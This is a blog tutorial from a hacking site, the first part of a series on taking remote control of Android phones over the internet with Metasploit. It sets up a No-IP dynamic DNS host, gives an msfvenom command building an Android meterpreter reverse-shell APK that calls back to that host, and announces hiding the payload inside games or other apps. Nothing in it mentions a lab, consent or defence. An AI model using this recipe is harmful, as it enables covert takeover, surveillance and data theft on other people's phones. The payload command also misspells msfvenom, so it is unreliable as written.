Android Malware, RATs & Keyloggers

Hack Any Android Over Internet Using Metasploit Part : 1

Today we’ll create metasploit payload embedding into android application and use it over Internet!

First we’ve to get the DDNS (Dynamic DNS) address to get the meterpreter session on the internet; so go to NOIP Dynamic DNS service and create an account there then you have to configure the DDNS with your system

So for Linux distributions:

Once you have opened up your Terminal window you will need to login as the “root” user. You can become the root user from the command line by entering “sudo -s” followed by the root password on your machine.

  1. cd /usr/local/src/
  2. wget http://www.no-ip.com/client/linux/noip-duc-linux.tar.gz
  3. tar xf noip-duc-linux.tar.gz
  4. cd noip-2.1.9-1/
  5. make install

You will then be prompted to login with your No-IP.com account username and password.

If you get “make not found” or “missing gcc” then you do not have the gcc compiler tools on your machine. You will need to install these in order to proceed.

Hack Any Android Over Internet Using Metasploit Part : 1

To Configure the Client

As root again (or with sudo) issue the below command:

/usr/local/bin/noip2 -C

(dash capital C, this will create the default config file)

You will then be prompted for your username and password for No-IP, as well as which host-names you wish to update. Be careful, one of the questions is “Do you wish to update ALL hosts”. If answered incorrectly this could effect hostnames in your account that are pointing at other locations.

Now the client is installed and configured, you just need to launch it. Simply issue this final command to launch the client in the background:

/usr/local/bin/noip2

Read the README file in the no-ip-2.1.9 folder for instructions on how to make the client run at startup. This varies depending on what Linux distribution you are running.

After getting your DDNS (it’ll be like hostname.ddns.net) configured you’ve to create metasploit Payload.

Secondly we’ve to create a msf payload using msfvenom:
command :

msfvenome -p android/meterpreter/reverse_tcp LHOST=hostname.ddns.net LPORT=4444 R> payload.apk

So the payload will be created.

Thirdly we’ve to bind the Payload with any other APK files like games or any applications etc
for that we should decomplie APK to put the metasploit Hook inside there.
Let’s see this in second (Last) Part : 2

Do comment below your feedback on this article! Thank You!

The following two tabs change content below.

Anuj Mishra

Admin, Founder & Chief Editor at HackeRoyale
Engineer. Blogger. Ethical hacker. Penetration Tester. Deep Webbie. Bug hunter. Security Analyst. Web Developer. Techie. Programmer. Foodie. Music Lover. Traveller. Enthusiast.

Comment Now !